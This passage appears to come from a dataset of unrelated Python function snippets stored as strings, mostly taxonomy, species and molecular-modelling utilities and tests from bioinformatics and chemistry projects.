self.ts_conf_spawned\n species_dict['ts_number'] = self.ts_number\n species_dict['ts_report'] = self.ts_report\n species_dict['rxn_label'] = self.rxn_label\n species_dict['successful_methods'] = self.successful_methods\n species_dict['unsuccessful_methods'] = self.unsuccessful_methods\n species_dict['chosen_ts_method'] = self.chosen_ts_method\n species_dict['chosen_ts'] = self.chosen_ts\n if self.run_time is not None:\n species_dict['run_time'] = self.run_time.total_seconds()\n species_dict['t1'] = self.t1\n species_dict['label'] = self.label\n species_dict['long_thermo_description'] = self.long_thermo_description\n species_dict['multiplicity'] = self.multiplicity\n if self.number_of_radicals is not None:\n species_dict['number_of_radicals'] = self.number_of_radicals\n species_dict['charge'] = self.charge\n species_dict['generate_thermo'] = self.generate_thermo\n if self.opt_level is not None:\n species_dict['opt_level'] = self.opt_level\n if self.final_xyz is not None:\n species_dict['final_xyz'] = self.final_xyz\n species_dict['number_of_rotors'] = self.number_of_rotors\n species_dict['rotors_dict'] = self.rotors_dict\n species_dict['external_symmetry'] = self.external_symmetry\n species_dict['optical_isomers'] = self.optical_isomers\n species_dict['neg_freqs_trshed'] = self.neg_freqs_trshed\n if self.conf_is_isomorphic is not None:\n species_dict['conf_is_isomorphic'] = self.conf_is_isomorphic\n if self.bond_corrections is not None:\n species_dict['bond_corrections'] = self.bond_corrections\n if self.mol is not None:\n species_dict['mol'] = self.mol.toAdjacencyList()\n if self.initial_xyz is not None:\n species_dict['initial_xyz'] = self.initial_xyz\n if self.checkfile is not None:\n species_dict['checkfile'] = self.checkfile\n if self.most_stable_conformer is not None:\n species_dict['most_stable_conformer'] = self.most_stable_conformer\n if self.cheap_conformer is not None:\n species_dict['cheap_conformer'] = self.cheap_conformer\n if self.recent_md_conformer is not None:\n species_dict['recent_md_conformer'] 
= self.recent_md_conformer\n if self.svpfit_output_file is not None:\n species_dict['svpfit_output_file'] = self.svpfit_output_file\n if self._radius is not None:\n species_dict['radius'] = self._radius\n if self.conformers:\n species_dict['conformers'] = self.conformers\n species_dict['conformer_energies'] = self.conformer_energies\n if self.conformers_before_opt is not None:\n species_dict['conformers_before_opt'] = self.conformers_before_opt\n if self.bdes is not None:\n species_dict['bdes'] = self.bdes\n return species_dict", "def species_lookup_by_taxonid(self, taxon_id):\n return self.species_name_lookup(taxon_id)", "def parse_taxonomy( seq_id, lineage, key_dictionary ):\n\tif seq_id in sti_dict:\n\t\ttax_id = sti_dict[ seq_id ]\n\t\ttax_names = [ tax_id ] #list of taxon names\n\telse:\n\t\ttax_id = str( seq_id )\n\t\ttax_names = [ tax_id ] #list of taxon names\n\ttax_numbers = [ seq_id ]\n\tis_A_list = [] #store is_A relationships\n\n\twhile lineage != '1': #forces traversal through the tri file until we get to the root of taxonomy\n\t\t#print lineage\n\t\tif lineage == '0': #need this to process the root in the tri file. \n\t\t\tbreak\n\t\tis_A_list = [lineage] + is_A_list\n\t\ttax_numbers = [lineage] + tax_numbers\n\t\tif lineage in sti_dict: #we have the next taxonomic representative in the sti file\n\t\t\ttax_id = sti_dict[ lineage ]\n\t\t\ttax_names = [tax_id] + tax_names #append tax_id to front of list\n\t\telse: #the taxon does not have a sequence representative. \n\t\t\ttax_id = str( lineage ) \n\t\t\ttax_names = [tax_id] + tax_names\n\t\t#now process to next lineage\n\t\tlineage = tri_dict[ lineage ] \n\n\n\ttax_names = ['root'] + tax_names #append tax_id to front of list\n\ttax_numbers = [lineage] + tax_numbers\n\tis_A_list = ['0'] + [lineage] + is_A_list\n\n\t#now append all of these reuslts to the final dictionary, which will be keyed \n\t#off of the tax_numbers list (unique IDs for each taxonomic level.\n\n\tfor i in xrange( len( tax_numbers ) ):\n\t\tid = tax_numbers[i]\n\t\tif id in key_dictionary:\n\t\t\tpass\n\t\telse:\n\t\t\tparent = is_A_list[i]\n\t\t\tlevel = i #taxonomic level (how far down in levels are we?)\n\t\t\tnames = process_names( tax_names[:i+1] )\n\t\t\tkey_dictionary[ id ] = [ parent, level, names ]\n\n\treturn( key_dictionary )", "def construct_taxonomy(termID_list, dih, dih_metric_name=\"invCL\", taxorg_method=\"NoCyc\", \n graph_init_threshold=0.01, verbose=True):\n assert dih_metric_name in [\"weeds_prec\", \"clarkeDE\", \"invCL\"]\n assert taxorg_method in [\"NoCyc\", \"DMST\"]\n\n # DIH\n weighted_edges = [] # (hyper, hypo, score)\n for termID_pair in tqdm(list(combinations(termID_list, r=2))):\n score = 2.0 * dih.predict(termID_pair[0], termID_pair[1], dih_metric_name)\n if score >= graph_init_threshold:\n weighted_edges.append([termID_pair[1], termID_pair[0], score])\n\n # reverse order testing\n score = 2.0 * dih.predict(termID_pair[1], termID_pair[0], dih_metric_name)\n if score >= graph_init_threshold:\n weighted_edges.append([termID_pair[0], termID_pair[1], score])\n\n # Taxonomy organization\n G = construct_graph(termID_list, weighted_edges)\n if verbose:\n print(\"Before Taxonomy Organization\")\n describe_graph(G)\n print(\"=\"*89)\n\n if taxorg_method == \"NoCyc\":\n T = NoCyc(G)\n elif taxorg_method == \"DMST\":\n T = DMST(G)\n\n if verbose:\n print(\"After Taxonomy Organization\")\n describe_graph(T)\n \n return T", "def genotype(rsid):\n if rsid[0] == 'I' or rsid[0] == 'i':\n return { 'error': 'Cannot find indicators, must use rs 
#s'}\n soup = BeautifulSoup(urllib.urlopen('http://snpedia.com/index.php/Special:Browse/' + rsid).read())\n trows = soup('table')[1].find_all('tr')\n if len(trows) < 2:\n return { 'error': 'That rsid does not have any data/does not exist.' }\n locations = getLocations(soup)\n genotypeData = getData(locations, soup)\n genotypeData['rsid'] = rsid\n return genotypeData", "def test_speciesCreation():\n \n sys = LVsystem.Ecosystem()\n sys.addSpecies('rabbit')\n sys.addSpecies('fox')\n sys.setInteraction('rabbit', 'fox', -1)\n sys.setInteraction('fox', 'rabbit', 1)\n sys.setInitialCond('rabbit', 10)\n sys.setInitialCond('fox', 5)\n sys.setGrowthRate('rabbit', 1)\n sys.setGrowthRate('fox', -1)\n sys.setCarrCap('rabbit', 10000)\n sys.setCarrCap('fox', 10000)\n sys.setChangeRate('rabbit', 10)\n sys.setChangeRate('fox', 20) \n \n assert len(sys.species_list) == 2\n assert sys.species_list == ['rabbit','fox']\n assert sys.intMatrix == {('rabbit','fox'):-1, ('fox','rabbit'):1}\n\n sys.removeSpecies('rabbit')\n sys.removeSpecies('fox')", "def create_taxonomy(dataset_name, attr, dataset=[]):\n #path = os.getcwd()\n\n path_in = os.getcwd()\n pattern = '^.*/thesis-data-anonymisation/'\n path_top = re.search(pattern, path_in).group(0)\n\n path = path_top +'data'\n\n if len(dataset_name) > 0:\n prefix = '../data/'+dataset_name+'/hierarchy_'\n else:\n prefix = '../data/hierarchy_'\n\n postfix = '.csv'\n\n try:\n file = open(path + '/' + prefix + attr + postfix, 'r')\n except FileNotFoundError:\n if len(dataset_name) > 0:\n prefix = '/data/'+dataset_name+'/hierarchy_'\n else:\n prefix = '/data/hierarchy_'\n file = open(path+prefix + attr + postfix, 'r')\n\n taxonomy = {}\n #dataset_group = dataset.groupby(attr).groups\n\n lines_in = file.readlines()\n file.close()\n lines = [line.strip().split(';') for line in lines_in]\n max_height = max([len(line) for line in lines])\n try:\n float(lines[0][0])\n is_numeric = True\n except ValueError:\n is_numeric = False\n for line in lines:\n #try:\n # if is_numeric:\n # dataset_group[int(line[0])]\n # else:\n # dataset_group[line[0]]\n #except KeyError:\n # continue\n line.reverse()\n for i, val in enumerate(line):\n is_leaf = False\n if val == '*':\n node = TaxNode(val, None, is_numeric, is_leaf)\n else:\n if i == len(line) - 1:\n is_leaf = True\n\n node = TaxNode(val, taxonomy[line[i - 1]][-1], is_numeric, is_leaf)\n try:\n current_nodes = taxonomy[val]\n already_added = False\n for current_node in current_nodes:\n if current_node.parent is None:\n already_added = True\n elif current_node.parent.value == node.parent.value:\n already_added = True\n if not already_added:\n taxonomy[val].append(node)\n except KeyError:\n taxonomy[val] = [node] # Saves the nodes in a list in case of several parents (only valid for nodes with several parents!!!)\n hierarchy = Taxonomy(taxonomy, max_height)\n\n return hierarchy", "def create_species_encode():\n\tdata = pd.read_csv(\"../train.csv\")\n\tspecies = sorted(data.species.unique())\n\tspecies_dict = {species: index for index, species in enumerate(species)}\n\treturn species_dict", "def __getTaxonomnyChainMapping(self, siftsSummaryDirPath, csvFileName):\n fp = os.path.join(siftsSummaryDirPath, csvFileName)\n rowDL = self.__readSiftsSummaryFile(fp)\n logger.info(\"Length of SIFTS summary file %s %d\", csvFileName, len(rowDL))\n logger.debug(\"%r\", list(rowDL[0].items()))\n tD = {}\n for rowD in rowDL:\n entryId = rowD[\"PDB\"]\n chainId = rowD[\"CHAIN\"]\n taxId = rowD[\"TAX_ID\"]\n tD.setdefault(entryId.upper(), 
{}).setdefault(chainId, {}).update({taxId: True})\n #\n logger.info(\"Taxonomy for %d entries\", len(tD))\n return tD", "def nsrTaxonomy():\r\n # Input file\r\n taxonomyFile = pd.read_csv(args.indir+\"/\"+args.infile1, header=2,\r\n sep=\"\\t\", encoding=\"utf8\")\r\n\r\n # Parse taxonomic names into their elementary components\r\n taxonomy = taxonomyFile.loc[taxonomyFile['rank'] == 'soort']\r\n taxonList = []\r\n for taxon in taxonomy['scientific_name']:\r\n parser = taxonParser(taxon)\r\n if not parser or parser is False:\r\n pass\r\n else:\r\n taxonList.append(parser)\r\n\r\n # Write taxonomy to file\r\n index = 0\r\n with io.open(par_path+\"/results/nsr_species.csv\", \"w\", encoding=\"utf-8\") as outfile:\r\n outfile.write('\"species_id\",\"species_name\",\"identification_reference\"\\n')\r\n for i in taxonList:\r\n binomial = ' '.join(str(i).split()[:2])\r\n authorship = ' '.join(str(i).split()[2:])\r\n outfile.write('%s,%s,\"%s\"\\n' % (index, binomial, authorship))\r\n index += 1\r\n\r\n return taxonList", "def build_phenotype(phenotype_id, adapter):\n phenotype_obj = {}\n phenotype = adapter.hpo_term(phenotype_id)\n if phenotype:\n phenotype_obj[\"phenotype_id\"] = phenotype[\"hpo_id\"]\n phenotype_obj[\"feature\"] = phenotype[\"description\"]\n return phenotype", "def __init__(\n self,\n gene_lists,\n taxon,\n requests_per_sec=10,\n padj_threshold=0.05,\n log2_fc_threshold=0,\n fc_threshold=None,\n enrichment_fdr=0.05,\n annot_col=\"Name\",\n ):\n Ontology.__init__(self)\n PlotGOTerms.__init__(self)\n\n self.gene_lists = gene_lists\n self.enrichment_fdr = enrichment_fdr\n\n # users can set the fold change threshold in the log2 scale or normal\n # scale.\n assert log2_fc_threshold >= 0, \"log2 fc_threshold must be >=0\"\n if fc_threshold is not None:\n log2_fc_threshold = pylab.log2(fc_threshold)\n\n from bioservices import panther, quickgo\n\n self.quick_go_graph = QuickGOGraph()\n\n self.panther = panther.Panther(cache=True)\n self.valid_taxons = [x[\"taxon_id\"] for x in self.panther.get_supported_genomes()]\n self.summary = {}\n\n self._taxon = None\n self.taxon = taxon\n\n self.quickgo = quickgo.QuickGO(cache=True)\n self.quickgo.requests_per_sec = requests_per_sec\n self.quickgo.services.settings.TIMEOUT = 120\n\n self._ancestors = {\n \"MF\": \"GO:0003674\",\n \"CC\": \"GO:0005575\",\n \"BP\": \"GO:0008150\",\n \"SLIM_MF\": \"GO:0003674\",\n \"SLIM_CC\": \"GO:0005575\",\n \"SLIM_BP\": \"GO:0008150\",\n }\n self.ontologies.extend(\n [\n \"ANNOT_TYPE_ID_PANTHER_GO_SLIM_MF\",\n \"ANNOT_TYPE_ID_PANTHER_GO_SLIM_BP\",\n \"ANNOT_TYPE_ID_PANTHER_GO_SLIM_CC\",\n \"ANNOT_TYPE_ID_PANTHER_PC\",\n \"ANNOT_TYPE_ID_PANTHER_PATHWAY\",\n \"ANNOT_TYPE_ID_REACTOME_PATHWAY\",\n ]\n )\n\n self.ontology_aliases.extend(\n [\n \"SLIM_MF\",\n \"SLIM_BP\",\n \"SLIM_CC\",\n \"PROTEIN\",\n \"PANTHER_PATHWAY\",\n \"REACTOME_PATHWAY\",\n ]\n )\n\n # panther accepts onyl ~2-3000 genes at max. 
Let us restrict the analysis\n # to the first 2000 genes based on their log2 fold change 2000 + and\n # 2000 negatives\n\n msg = \"Ignoring DEGs with adjusted p-value > {} and fold change in [{}, {}]\".format(\n padj_threshold, 1 / (2**log2_fc_threshold), 2**log2_fc_threshold\n )\n logger.info(msg)\n\n # used in report module\n self.summary[\"fold_change_range\"] = [\n 1 / (2**log2_fc_threshold),\n 2**log2_fc_threshold,\n ]\n self.summary[\"padj_threshold\"] = padj_threshold\n\n fc_threshold = log2_fc_threshold\n\n for x in sorted(gene_lists.keys()):\n\n N = len(gene_lists[x])\n logger.info(f\"Starting with {N} genes from category '{x}'\")\n\n self.summary[\"DGE_after_filtering\"] = {k: len(v) for k, v in gene_lists.items()}\n\n self.enrichment = {}\n self.stats = {}\n self.obsolets = []", "def testTaxaData(self):\n try:\n numEukaryota = 0\n numBacteria = 0\n numVirus = 0\n numArchaea = 0\n numOther = 0\n numUnclass = 0\n logger.info(\"Loading taxonomy data\")\n tU = TaxonomyUtils()\n logger.info(\"Done loading taxonomy data\")\n iCount = 0\n entryD = self.__mU.doImport(self.__instanceSavePath, fmt=\"pickle\")\n for entryId in entryD:\n for entityId, eD in entryD[entryId][\"selected_polymer_entities\"].items():\n taxId = eD[\"ncbi_taxonomy_id\"] if \"ncbi_taxonomy_id\" in eD else None\n if taxId is None:\n logger.debug(\"Missing taxId entryId %s entityId %s\", entryId, entityId)\n continue\n # lin = tU.getLineage(taxId)\n # nmL = tU.getLineageNames(taxId)\n ok1 = tU.isEukaryota(taxId)\n if ok1:\n numEukaryota += 1\n ok3 = tU.isVirus(taxId)\n if ok3:\n numVirus += 1\n ok2 = tU.isBacteria(taxId)\n if ok2:\n numBacteria += 1\n #\n ok4 = tU.isArchaea(taxId)\n if ok4:\n numArchaea += 1\n #\n ok5 = tU.isOther(taxId)\n if ok5:\n numOther += 1\n #\n ok6 = tU.isUnclassified(taxId)\n if ok6:\n numUnclass += 1\n\n if ok1 and (ok1 and ok2):\n logger.info(\"taxid %r conflicting lineage\", taxId)\n #\n if not ok1 and not ok2 and not ok3 and not ok4 and not ok5 and not ok6:\n logger.info(\"unassigned taxid %r\", taxId)\n\n logger.debug(\"taxId %r entryId %s entityId %s\", taxId, entryId, entityId)\n iCount += 1\n # if iCount > 5000:\n # break\n logger.info(\"Eukaryota %d Bacteria %d Virus %d Archaea %d Other/Syn %r Unclass %d\", numEukaryota, numBacteria, numVirus, numArchaea, numOther, numUnclass)\n except Exception as e:\n logger.exception(\"Failing with %s\", str(e))\n self.fail()", "def create_specimen_taxonomy():\n\n form = TaxonomyForm()\n if session.get(\"link\") is not None:\n if form.validate_on_submit():\n session[\"common_name\"] = (\n form.common_name.data or Taxonomy.common_name.default.arg\n )\n session[\"species\"] = form.species.data or Taxonomy.species.default.arg\n session[\"genus\"] = form.genus.data or Taxonomy.genus.default.arg\n session[\"family\"] = form.family.data or Taxonomy.family.default.arg\n session[\"order\"] = form.order.data or Taxonomy.order.default.arg\n session[\"phylum\"] = form.phylum.data or Taxonomy.phylum.default.arg\n session[\"kingdom\"] = form.kingdom.data or Taxonomy.kingdom.default.arg\n session[\"authorship\"] = (\n form.authorship.data or Taxonomy.authorship.default.arg\n )\n\n return redirect(\"/specimen/new/details\")\n\n else:\n return render_template(\n \"newspecimen.html\", form=form, step=\"taxonomy\"\n )\n else:\n return (\"\", 403)", "def create_all_taxonomic_keys(point_locations: dict, location_species: dict, location_range_species: dict,\n trait_data: dict, all_taxa_data: dict) -> dict:\n\n all_keys = {}\n\n # find all unique sets of species\n 
species_sets = set()\n for p in point_locations:\n loc = point_locations[p]\n all_species = set()\n all_species |= location_species[loc.name]\n if loc.n_direct_children() > 0:\n for c in loc.direct_children():\n all_species |= fetch_child_data(c, location_species)\n\n range_species = set(find_species_by_name(s) for s in location_range_species[loc])\n all_species |= range_species\n if len(all_species) > 0:\n species_sets.add(frozenset(all_species))\n\n # create keys for each unique set of species\n warnings = set()\n for sp_set in species_sets:\n taxa_data = {}\n for s in sp_set:\n try:\n taxa_data[\"Male \" + s.binomial()] = all_taxa_data[\"♂ Male {{\" + s.species + \"}}\"]\n taxa_data[\"Female \" + s.binomial()] = all_taxa_data[\"♀ Female {{\" + s.species + \"}}\"]\n except KeyError:\n report_error(\"Missing taxonomic key data: \" + s.species)\n\n all_keys[sp_set], new_warning = TMB_TaxKeyGen.generate_taxonomic_key(trait_data, taxa_data, verbose=False)\n warnings |= new_warning\n\n # global key for all species\n all_keys[\"all\"], new_warning = TMB_TaxKeyGen.generate_taxonomic_key(trait_data, all_taxa_data, verbose=False)\n warnings |= new_warning\n\n for w in sorted(warnings):\n report_error(w)\n\n return all_keys", "def update_tip_names(tree, taxdict):\n\n list_nodes = []\n uniprot_mapping = pd.DataFrame(columns=['taxid', 'name', 'uniprot'])\n\n counter = 0\n for node in tree.traverse(\"postorder\"):\n current_name = node.name\n\n if 'NMR' in current_name:\n new_name = \"Heterocephalus_glaber\"\n node.name = new_name\n list_nodes.append(node.name)\n taxid = \"NA\" \n uniprot_mapping.loc[counter] = (taxid, new_name, \"UP000006813\")\n counter += 1\n\n elif 'Nfurzer' in current_name:\n new_name = \"Nothobranchius_furzeri\"\n node.name = new_name\n list_nodes.append(node.name)\n taxid = \"NA\"\n uniprot_mapping.loc[counter] = (taxid, new_name, new_name)\n counter += 1\n\n elif 'TAX' in current_name:\n taxid = current_name[3:].split('x')[0]\n new_name = taxdict.get(taxid, taxid) \n node.name = new_name \n list_nodes.append(node.name)\n unip = get_uniprot(taxid, accession)\n uniprot_mapping.loc[counter] = (taxid, new_name, unip)\n counter += 1\n\n\n \n tree.write(outfile=\"../../data/tree/tree.nw\")\n\n nodes_df = pd.DataFrame(list_nodes)\n nodes_df.to_csv(\"../../data/tree/tree_list_nodes.txt\", index=False, header=False)\n\n uniprot_mapping.to_csv(\"../../data/tree/tree_uniprot.txt\", sep='\\t', index=False, header=True)\n\n return tree, list_nodes", "def duplicate_names(self, taxonomy, check_species=True):\n\n # get lineages for each taxon name\n taxon_lineages = defaultdict(set)\n for taxa in taxonomy.values():\n for i, taxon in enumerate(taxa):\n if len(taxon) > 3:\n taxon_lineages[taxon].add(';'.join(taxa[0:i + 1]))\n\n # identify taxon belonging to multiple lineages\n duplicates = {}\n for taxon, lineages in taxon_lineages.items():\n if len(lineages) >= 2:\n if not taxon.startswith('s__') or check_species:\n duplicates[taxon] = lineages\n\n return duplicates", "def fill_taxonomy_database(taxids, password):\r\n\r\n for taxid in taxids:\r\n lineage = ncbi.get_lineage(taxid)\r\n names = ncbi.get_taxid_translator(lineage)\r\n print(lineage)\r\n print([names[taxid] for taxid in lineage])\r\n\r\n previous = \"\"\r\n\r\n for lin in lineage:\r\n if int(lin) != 1: # skipping 'root'\r\n rank = ncbi.get_rank([lin])\r\n SQL_connection = set_connection(password)\r\n cursor = SQL_connection.cursor(buffered=True)\r\n cursor.execute(\r\n \"select * \"\r\n \"from Taxonomie \"\r\n \"where taxonomy_ID = 
{};\".format(\r\n lin))\r\n results = cursor.fetchone()\r\n if results is None:\r\n if previous == \"\":\r\n cursor.execute(\"insert into Taxonomie \"\r\n \"(rank_up, taxonomy_ID, naam, rang) \"\r\n \"values(NULL, {}, '{}', '{}');\".format(\r\n lin, names[lin], rank[lin]))\r\n SQL_connection.commit()\r\n else:\r\n cursor.execute(\"insert into Taxonomie \"\r\n \"(rank_up, taxonomy_ID, naam, rang) \"\r\n \"values({}, {}, '{}', '{}');\".format(\r\n previous, lin, names[lin], rank[lin]))\r\n SQL_connection.commit()\r\n cursor.close()\r\n SQL_connection.close()\r\n previous = lin", "def create_city():\n city = {}\n city['biysk'] = {}\n city['biysk']['barnaul'] = 9\n city['biysk']['novosibirsk'] = 11\n city['biysk']['belokurikha'] = 8\n city['barnaul'] = {}\n city['barnaul']['tomsk'] = 4\n city['belokurikha'] = {}\n city['belokurikha']['novosibirsk'] = 2\n city['novosibirsk'] = {}\n city['novosibirsk']['barnaul'] = 2\n city['novosibirsk']['tomsk'] = 5\n city['novosibirsk']['omsk'] = 20\n city['tomsk'] = {}\n city['tomsk']['krasnoyarsk'] = 6\n city['krasnoyarsk'] = {}\n city['krasnoyarsk']['omsk'] = 7\n city['omsk'] = {}\n return city", "def createIndivitual(self) -> Dict[str, Any]:\n ind = {\n \"genome\": {\n key: numpy.random.randint(0, len(value), size=self.ref_count[key]) for (\n key, value) in self.grammar.items()\n },\n \"fitness\": None,\n \"fenotype\": None,\n }\n return ind", "def get_species_list() -> list:\n c2h2_xyz = {'symbols': ('C', 'C', 'H', 'H'), 'isotopes': (12, 12, 1, 1),\n 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 1.203142), (0.0, -0.0, 2.265747), (-0.0, -0.0, -1.062605))}\n ch4_xyz = {'symbols': ('C', 'H', 'H', 'H', 'H'), 'isotopes': (12, 1, 1, 1, 1),\n 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 1.08744517), (1.02525314, 0.0, -0.36248173),\n (-0.51262658, 0.88789525, -0.36248173), (-0.51262658, -0.88789525, -0.36248173))}\n co2_xyz = {'symbols': ('C', 'O', 'O'), 'isotopes': (12, 16, 16),\n 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 1.1594846), (0.0, 0.0, -1.1594846))}\n co_xyz = {'symbols': ('O', 'C'), 'isotopes': (16, 12), 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 1.12960815))}\n f2_xyz = {'symbols': ('F', 'F'), 'isotopes': (19, 19), 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 1.3952041))}\n ch2o_xyz = {'symbols': ('O', 'C', 'H', 'H'), 'isotopes': (16, 12, 1, 1),\n 'coords': ((0.0, 0.0, 0.674622), (0.0, 0.0, -0.529707),\n (0.0, 0.935488, -1.109367), (0.0, -0.935488, -1.109367))}\n h2o_xyz = {'symbols': ('O', 'H', 'H'), 'isotopes': (16, 1, 1),\n 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 0.95691441), (0.92636305, 0.0, -0.23986808))}\n h2_xyz = {'symbols': ('H', 'H'), 'isotopes': (1, 1), 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 0.74187646))}\n hcn_xyz = {'symbols': ('C', 'N', 'H'), 'isotopes': (12, 14, 1),\n 'coords': ((0.0, 0.0, -0.500365), (0.0, 0.0, 0.65264), (0.0, 0.0, -1.566291))}\n hf_xyz = {'symbols': ('F', 'H'), 'isotopes': (19, 1), 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 0.91538107))}\n n2o_xyz = {'symbols': ('N', 'N', 'O'), 'isotopes': (14, 14, 16),\n 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 1.12056262), (0.0, 0.0, 2.30761092))}\n n2_xyz = {'symbols': ('N', 'N'), 'isotopes': (14, 14), 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 1.09710935))}\n nh3_xyz = {'symbols': ('N', 'H', 'H', 'H'), 'isotopes': (14, 1, 1, 1),\n 'coords': ((0.0, 0.0, 0.11289), (0.0, 0.938024, -0.263409),\n (0.812353, -0.469012, -0.263409), (-0.812353, -0.469012, -0.263409))}\n oh_xyz = {'symbols': ('O', 'H'), 'isotopes': (16, 1), 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 0.967))}\n cl2_xyz = {'symbols': ('Cl', 'Cl'), 'isotopes': 
(35, 35), 'coords': ((0.0, 0.0, 0.0), (0.0, 0.0, 1.1))}\n\n c2h2 = ARCSpecies(label='C2H2', smiles='C#C', multiplicity=1, charge=0)\n c2h2.initial_xyz = c2h2_xyz\n\n ch4 = ARCSpecies(label='CH4', smiles='C', multiplicity=1, charge=0)\n ch4.initial_xyz = ch4_xyz\n\n co2 = ARCSpecies(label='CO2', smiles='O=C=O', multiplicity=1, charge=0)\n co2.initial_xyz = co2_xyz\n\n co = ARCSpecies(label='CO', smiles='[C-]#[O+]', multiplicity=1, charge=0)\n co.initial_xyz = co_xyz\n\n f2 = ARCSpecies(label='F2', smiles='[F][F]', multiplicity=1, charge=0)\n f2.initial_xyz = f2_xyz\n\n ch2o = ARCSpecies(label='CH2O', smiles='C=O', multiplicity=1, charge=0)\n ch2o.initial_xyz = ch2o_xyz\n\n h2o = ARCSpecies(label='H2O', smiles='O', multiplicity=1, charge=0)\n h2o.initial_xyz = h2o_xyz\n\n h2 = ARCSpecies(label='H2', smiles='[H][H]', multiplicity=1, charge=0)\n h2.initial_xyz = h2_xyz\n\n hcn = ARCSpecies(label='HCN', smiles='C#N', multiplicity=1, charge=0)\n hcn.initial_xyz = hcn_xyz\n\n hf = ARCSpecies(label='HF', smiles='F', multiplicity=1, charge=0)\n hf.initial_xyz = hf_xyz\n\n n2o = ARCSpecies(label='N2O', smiles='[N-]=[N+]=O', multiplicity=1, charge=0)\n n2o.initial_xyz = n2o_xyz\n\n n2 = ARCSpecies(label='N2', smiles='N#N', multiplicity=1, charge=0)\n n2.initial_xyz = n2_xyz\n\n nh3 = ARCSpecies(label='NH3', smiles='N', multiplicity=1, charge=0)\n nh3.initial_xyz = nh3_xyz\n\n oh = ARCSpecies(label='OH', smiles='[OH]', multiplicity=2, charge=0)\n oh.initial_xyz = oh_xyz\n\n cl2 = ARCSpecies(label='Cl2', smiles='[Cl][Cl]', multiplicity=1, charge=0)\n cl2.initial_xyz = cl2_xyz\n\n species_list = [c2h2, ch4, co2, co, f2, ch2o, h2o, h2, hcn, hf, n2o, n2, nh3, oh, cl2]\n\n return species_list", "def test_taxonomy(n=5):\n ecoli_file = join(this_dir, \"e_coli_core.xml.gz\")\n ids = [\"Escherichia_coli_{}\".format(i) for i in range(1, n + 1)]\n taxa = pd.DataFrame({\"id\": ids})\n taxa[\"genus\"] = \"Escherichia\"\n taxa[\"species\"] = \"Eschericia coli\"\n taxa[\"reactions\"] = 95\n taxa[\"metabolites\"] = 72\n taxa[\"file\"] = ecoli_file\n return taxa", "def dict_initialise(metadata, analysistype):\n for sample in metadata:\n sample[analysistype].dnaseq = dict()\n sample[analysistype].protseq = dict()\n sample[analysistype].ntindex = dict()\n sample[analysistype].aaindex = dict()\n sample[analysistype].ntalign = dict()\n sample[analysistype].aaalign = dict()\n sample[analysistype].aaidentity = dict()\n return metadata", "def read_mothur_cons_taxonomy(f):\n d_otu2tax = {}\n for n, line in enumerate(open(f)):\n # the first header line does not startswith \"#\" in v1.33\n if line.startswith('OTU\\tSize\\tTaxonomy'):\n continue\n\n if line.startswith('#'):\n continue\n\n line = line.rstrip()\n otu, num, taxa = line.rstrip().split('\\t')\n skip = False\n for word in EXCLUDE:\n if word in taxa:\n skip = True\n break\n\n if skip:\n continue \n\n # the parsing of taxa works for both mothur output and this\n taxa = taxa.rstrip(';') # for mothur classfy.seqs output\n lis = taxa.split(';')\n lis2 = []\n for item in lis:\n item = item.strip() # for copyrigher copy table ' ;' separater\n if item.endswith(')'):\n item = item.rsplit('(', 1)[0].strip()\n\n # remove taxon level prefix, e.g. 
'p__Firmicutes'\n if '__' in item:\n item = item.split('__', 1)[1]\n\n #item = item.strip('\"')\n\n # green gene taxonomy has sapce\n item = item.replace(' ', '_')\n\n item = item.lower()\n if item in ['unknown', 'unclassified', 'other', 'unassigned']:\n item = 'Unclassifed'\n\n item = item.capitalize()\n lis2.append(item)\n\n length = len(lis2)\n mes = 'levels number ({}) is not ({}): {}'\n assert length == LEVELS, mes.format(\n length, LEVELS, repr(lis2))\n d_otu2tax[otu] = tuple(lis2)\n\n return d_otu2tax", "def test_parse_taxonomy_to_otu_metadata(self):\r\n example_tax = \\\r\n \"\"\"412 PC.635_647\tRoot;Bacteria;Firmicutes;\"Clostridia\";Clostridiales\t0.930\r\n319 PC.355_281\tRoot;Bacteria;Bacteroidetes\t0.970\r\n353 PC.634_154\tRoot;Bacteria;Bacteroidetes\t0.830\r\n17 PC.607_302\tRoot;Bacteria;Bacteroidetes\t0.960\r\n13\tRoot;Bacteria;Firmicutes;\"Clostridia\";Clostridiales\t0.870\r\n338 PC.593_1314\tRoot;Bacteria\t0.990\"\"\"\r\n actual = parse_taxonomy_to_otu_metadata(example_tax.split('\\n'))\r\n expected = {\r\n '412': {'taxonomy': ['Root', 'Bacteria', 'Firmicutes',\r\n '\"Clostridia\"', 'Clostridiales'], 'score': 0.930},\r\n '319':\r\n {'taxonomy': ['Root',\r\n 'Bacteria',\r\n 'Bacteroidetes'],\r\n 'score': 0.970},\r\n '353':\r\n {'taxonomy': ['Root',\r\n 'Bacteria',\r\n 'Bacteroidetes'],\r\n 'score': 0.830},\r\n '17':\r\n {'taxonomy': ['Root',\r\n 'Bacteria',\r\n 'Bacteroidetes'],\r\n 'score': 0.960},\r\n '13': {'taxonomy': ['Root', 'Bacteria', 'Firmicutes',\r\n '\"Clostridia\"', 'Clostridiales'], 'score': 0.870},\r\n '338': {'taxonomy': ['Root', 'Bacteria'], 'score': 0.990}}\r\n self.assertEqual(actual, expected)", "def create_tree_objects(tree_ids_list, species_list):\n\ttree_objects = []\n\n\tfor tree_id in tree_ids_list:\n\t\tfname = tree_id+\".nex\"\t\n\t\ttree_nxobj = dendropy.Tree.get(file=open(data_folder+fname, \"r\"), schema=\"nexus\")\n\t\ttree_size = count_taxa_tree(tree_nxobj)\n\t\tfound_list = []\n\t\tfor species in species_list:\t\n\t\t\tnode = tree_nxobj.find_node_with_taxon_label(species)\n\t\t\tif node is None:\n\t\t\t\tcontinue #taxon not found\n\t\t\telse:\n\t\t\t\tfound_list.append(species)\n\n\t\tif len(found_list) > 0: #removing trees that do not contain any of the input species\n\t\t\ttree_objects.append(TBTree(tree_id, tree_size, found_list))\n\n\treturn tree_objects", "def divide_to_species(self):\n titles = []\n for i in 